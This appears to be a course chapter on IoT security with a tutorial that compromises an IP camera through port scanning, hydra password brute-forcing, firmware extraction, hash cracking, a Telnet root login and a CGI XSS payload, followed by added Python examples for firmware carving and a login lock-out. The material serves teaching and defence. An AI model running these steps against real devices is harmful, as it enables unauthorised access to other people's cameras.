Internet of Things Security

Objectives

We have built an infrastructure on the Internet around servers and desktops with highly secure operating systems, such as Windows 7/8 and Mac OS X. These systems are often well tested and run a range of security software, with regular updates based on security threats. The greatest threat to Internet security is devices which are fairly static in their operation, have limited capacity for updates, and can often contain things like default passwords and open ports that intruders could connect to. The key findings are:

The key objectives of this chapter are:
Lecture

The following provides some background on the different types of architectures used to connect devices to the Internet, and then demonstrates how an IP camera can be compromised:

Tests

Slides

The slides for the chapter are [here]

Tutorial

This article outlines how we can assess the security of a Linux-based embedded system. First we determine the TCP ports open on the device:

root@kali:~/system/system/bin# nmap 192.168.0.2

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-04 12:52 GMT
Nmap scan report for Unknown (192.168.0.2)
Host is up (0.0062s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
8600/tcp open  asterix
MAC Address: 78:A5:DD:08:FC:DC (Shenzhen Smarteye Digital Electronics Co.)

Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds

Next, we find that the Web server does not have a lock-out on usernames and passwords:

billbuchanan@Bills-MacBook-Pro:~/webcam$ hydra -V -W 1 -t 1 -L user.txt -P pass.txt 192.168.0.2 http
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-01-04 12:59:18
[WARNING] The service http has been replaced with http-head and http-get, using by default GET method. Same for https.
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] 1 task, 1 server, 30 login tries (l:5/p:6), ~30 tries per task
[DATA] attacking service http-get on port 80
[ATTEMPT] target 192.168.0.2 - login "root" - pass "password" - 1 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "root" - pass "default" - 2 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "root" - pass "none" - 3 of 30 [child 0]
...
[ATTEMPT] target 192.168.0.2 - login "admin" - pass "123" - 16 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "admin" - pass "12345" - 17 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "admin" - pass "123456" - 18 of 30 [child 0]
[80][www] host: 192.168.0.2   login: admin   password: 123456
[ATTEMPT] target 192.168.0.2 - login "user" - pass "password" - 19 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "user" - pass "default" - 20 of 30 [child 0]
[ATTEMPT] target 192.168.0.2 - login "user" - pass "none" - 21 of 30 [child 0]

The Telnet service on the IP camera locks out after three attempts, but we can examine the firmware from the camera:

root@kali:~# binwalk 51.3.0.152.bin

DECIMAL       HEX           DESCRIPTION
-------------------------------------------------------------------------------------------------------------------
36            0x24          Zip archive data, at least v1.0 to extract, name: "system/"
101           0x65          Zip archive data, at least v1.0 to extract, name: "system/Wireless/"
175           0xAF          Zip archive data, at least v1.0 to extract, name: "system/system/"
247           0xF7          Zip archive data, at least v1.0 to extract, name: "system/system/drivers/"
327           0x147         Zip archive data, at least v1.0 to extract, name: "system/system/bin/"
403           0x193         Zip archive data, at least v2.0 to extract, compressed size: 25717, uncompressed size: 108204, name: "system/system/bin/daemon.v5.5"
26207         0x665F        Zip archive data, at least v2.0 to extract, compressed size: 167785, uncompressed size: 685920, name: "system/system/bin/mailx"
194073        0x2F619       Zip archive data, at least v2.0 to extract, compressed size: 238464, uncompressed size: 780068, name: "system/system/bin/encoder"
432620        0x699EC       Zip archive data, at least v2.0 to extract, compressed size: 3106, uncompressed size: 8372, name: "system/system/bin/gmail_thread"
435814        0x6A666       Zip archive data, at least v2.0 to extract, compressed size: 3075, uncompressed size: 8260, name: "system/system/bin/cmd_thread"
438975        0x6B2BF       Zip archive data, at least v2.0 to extract, compressed size: 13149, uncompressed size: 45876, name: "system/system/bin/ssmtp"
452205        0x6E66D       Zip archive data, at least v2.0 to extract, compressed size: 24681, uncompressed size: 104800, name: "system/system/bin/daemon.v5.3"
476973        0x7472D       Zip archive data, at least v2.0 to extract, compressed size: 84641, uncompressed size: 170920, name: "system/system/bin/unzip1"
561696        0x89220       Zip archive data, at least v2.0 to extract, compressed size: 15429, uncompressed size: 43616, name: "system/system/bin/upnpc-static"
577213        0x8CEBD       Zip archive data, at least v2.0 to extract, compressed size: 35607, uncompressed size: 95132, name: "system/system/bin/ftp"
612899        0x95A23       Zip archive data, at least v1.0 to extract, name: "system/system/lib/"
612975        0x95A6F       Zip archive data, at least v1.0 to extract, name: "system/www/"
613044        0x95AB4       Zip archive data, at least v1.0 to extract, name: "system/init/"
613114        0x95AFA       Zip archive data, at least v2.0 to extract, compressed size: 99, uncompressed size: 203, name: "system/init/ipcam.sh"
615021        0x9626D       End of Zip archive

We can now carve the firmware out to a ZIP file (image.zip), skipping the 36 bytes that precede the archive, and then extract it using:

dd bs=1 skip=36 if=51.3.0.152.bin of=image.zip
unzip image.zip

Next we can examine the daemon file for its contents, and can see that it contains the details of the /etc/passwd file:

root@kali:~# cat daemon.v5.5
ps > /tmp/gps.txt/tmp/gps.txtrfopen failed encoderreboot/system/system/bin/encoder &/etc/passwdwbroot:LSiuY7pOmZG2s:0:0:Adminstrator:/:/bin/sh/etc/grouproot:x:0:adminsystem:%2x-%2x-%2x this isn't system file

We can then use John the Ripper to determine the password for the Administrator:

john pass.txt
root:123456:0:0:Adminstrator
1 password hash cracked, 0 left

After this we can log into the device using Telnet:

billbuchanan@Bills-MacBook-Pro:~/webcam$ telnet 192.168.0.2
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
(none) login: root
Password: 123456

BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# ls
var tmp sys proc mnt lib home etc bin usr system sbin param media init etc_ro dev
# cd system
# ls
system daemon Wireless init www
# cd www
# ls
mime.types config.htm ftp.htm status.htm Deutsch jpeg.html user.htm index1.htm snapshot.htm traditional_chinese test_mail.htm alias.htm
...
ip.htm system-b.ini appversion.txt french recordplay.htm sensordata.bin upnp.htm params_backup.cgi ptz.htm ap.htm multidev.htm recordsch.htm

We can then examine the system:

# cat /proc/version
Linux version 2.6.21 (root@mailzxh-desktop) (gcc version 3.4.2) #636 Fri Nov 16 10:03:21 CST 2012
# cat /proc/cpuinfo
system type             : Ralink SoC
processor               : 0
cpu model               : MIPS 24K V4.12
BogoMIPS                : 239.10
wait instruction        : yes
microsecond timers      : yes
tlb_entries             : 32
extra interrupt vector  : yes
hardware watchpoint     : yes
ASEs implemented        : mips16 dsp
VCED exceptions         : not available
VCEI exceptions         : not available
# cd /system
# cd init/
# ls
ipcam.sh
# cat ipcam.sh
export LD_LIBRARY_PATH=/system/system/lib:$LD_LIBRARY_PATH
export PATH=/system/system/bin:$PATH
telnetd
/system/system/bin/daemon.v5.5 &
/system/system/bin/cmd_thread &
/system/system/bin/gmail_thread &

Finally, there is an XSS vulnerability on the device which allows script code to be injected through a parameter of a CGI script:

http://192.168.0.2:80/set_alias.cgi?alias=%22;alert("hello");var%20a=%22&next_url=alias.htm&loginuse=admin&loginpas=abc

This will cause the message "Hello" to be displayed for every page accessed.

Conclusions

Application developers and integrators need to have a strong understanding of security in the systems that they create. This article has shown how easy it can be to compromise a device with limited capacity, and that the number of these devices will increase.
It should be remembered that there is often little scope for updates on embedded systems, so if users do not update their firmware they can be open to abuse from intruders. The target for intruders in the future could thus move from servers and desktops to a range of Internet-enabled devices. The same security testing that is currently applied to traditional computer systems needs to be applied to these devices. The main weakness on this camera is that there is no lock-out for continual password prompting. Thus, if a weak password is used, it is often fairly easy for an intruder to gain access to the device.
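The firmware step in the tutorial relies on binwalk reporting the ZIP archive at offset 36 and then carving it with dd. The following is an added example (not code from the article or from the camera vendor) that does the same thing programmatically: it locates the ZIP local file header signature, decodes the header fields binwalk prints (version needed, compressed and uncompressed sizes, name), and carves the archive up to its End of Central Directory record. The image it works on is a constructed stand-in for 51.3.0.152.bin: 36 bytes of padding followed by a small ZIP containing an ipcam.sh.

```python
import io
import struct
import zipfile

# Added example, not from the original article: carve an embedded ZIP out of a firmware
# image by its signature instead of hand-copying the offset into "dd bs=1 skip=36".
ZIP_LOCAL_SIG = b"PK\x03\x04"   # local file header signature
ZIP_EOCD_SIG = b"PK\x05\x06"    # End of Central Directory signature
SAMPLE_SCRIPT = "telnetd\n/system/system/bin/daemon.v5.5 &\n"   # constructed ipcam.sh content

def find_zip_offsets(image: bytes) -> list[int]:
    """Return every offset at which a ZIP local file header starts."""
    offsets, pos = [], image.find(ZIP_LOCAL_SIG)
    while pos != -1:
        offsets.append(pos)
        pos = image.find(ZIP_LOCAL_SIG, pos + 1)
    return offsets

def describe_entry(image: bytes, offset: int) -> dict:
    """Decode the 30-byte local file header at offset (the fields binwalk prints per entry)."""
    (version, _flags, _method, _mtime, _mdate, _crc, comp_size,
     uncomp_size, name_len, extra_len) = struct.unpack_from("<HHHHHIIIHH", image, offset + 4)
    name = image[offset + 30 : offset + 30 + name_len].decode("utf-8", "replace")
    return {"offset": offset, "version": version / 10, "compressed": comp_size,
            "uncompressed": uncomp_size, "name": name}

def carve_zip(image: bytes, start: int) -> bytes:
    """Carve from the first local header through the End of Central Directory record."""
    eocd = image.rfind(ZIP_EOCD_SIG)
    if eocd == -1 or eocd < start:
        raise ValueError("no End of Central Directory record after start offset")
    comment_len = struct.unpack_from("<H", image, eocd + 20)[0]   # EOCD is 22 bytes + comment
    return image[start : eocd + 22 + comment_len]

def build_sample_image() -> bytes:
    """Constructed stand-in for 51.3.0.152.bin: 36 bytes of header, then a small ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("system/init/ipcam.sh", SAMPLE_SCRIPT)
    return b"\x00" * 36 + buf.getvalue()

def extract_firmware(image: bytes) -> dict[str, bytes]:
    """Equivalent of the dd + unzip step: carve the embedded ZIP and return its members."""
    start = find_zip_offsets(image)[0]
    with zipfile.ZipFile(io.BytesIO(carve_zip(image, start))) as zf:
        return {info.filename: zf.read(info) for info in zf.infolist()}

if __name__ == "__main__":
    img = build_sample_image()
    for off in find_zip_offsets(img):
        print(describe_entry(img, off))
    print(extract_firmware(img))
```

On a real image, a second signature hit inside compressed data is possible, so the offsets list should be checked against the decoded header fields before carving.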
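The conclusion identifies the missing lock-out on the Web server as the main weakness, while the Telnet service locks out after three attempts. The following is an added example (not the camera's code) of the check the Web server lacks: failed attempts from one source against one account are counted in a sliding window, three failures lock that pair for a period, and a correct password offered during the lock-out is still refused. The credential store, addresses, thresholds and the wordlist are constructed for the example.

```python
from collections import deque
from dataclasses import dataclass, field

# Added example, not from the original article: a failed-login lock-out of the kind the
# camera's Telnet service has but its Web server lacks. Thresholds are constructed values.
MAX_FAILURES = 3      # the Telnet service on the camera locks out after three attempts
WINDOW = 60.0         # seconds over which failures are counted
LOCKOUT = 300.0       # seconds the (source, user) pair stays locked

@dataclass
class LoginGuard:
    credentials: dict[str, str]   # constructed sample store; a real device stores hashes, not passwords
    failures: dict[tuple[str, str], deque] = field(default_factory=dict)
    locked_until: dict[tuple[str, str], float] = field(default_factory=dict)

    def attempt(self, source: str, user: str, password: str, now: float) -> str:
        """Return 'ok', 'denied' or 'locked' for one login attempt made at time `now`."""
        key = (source, user)   # keyed per source so one remote host cannot lock the admin out
        if self.locked_until.get(key, 0.0) > now:
            return "locked"    # refused before the password is even compared
        recent = self.failures.setdefault(key, deque())
        while recent and now - recent[0] > WINDOW:
            recent.popleft()   # forget failures that fell out of the sliding window
        if self.credentials.get(user) == password:
            recent.clear()
            return "ok"
        recent.append(now)
        if len(recent) >= MAX_FAILURES:
            self.locked_until[key] = now + LOCKOUT
            recent.clear()
            return "locked"
        return "denied"

def replay_guess_list(guard: LoginGuard, source: str, user: str, guesses: list[str],
                      correct: str, start: float = 0.0, gap: float = 1.0) -> list[str]:
    """Feed a wordlist at one attempt per `gap` seconds, as a single-task hydra run would."""
    results = [guard.attempt(source, user, g, start + i * gap) for i, g in enumerate(guesses)]
    # the correct password, tried right after the lock-out has triggered, is still refused
    results.append(guard.attempt(source, user, correct, start + len(guesses) * gap))
    return results

if __name__ == "__main__":
    guard = LoginGuard({"admin": "123456"})   # constructed account and password
    print(replay_guess_list(guard, "192.0.2.10", "admin",
                            ["password", "default", "none", "123", "12345"], "123456"))
```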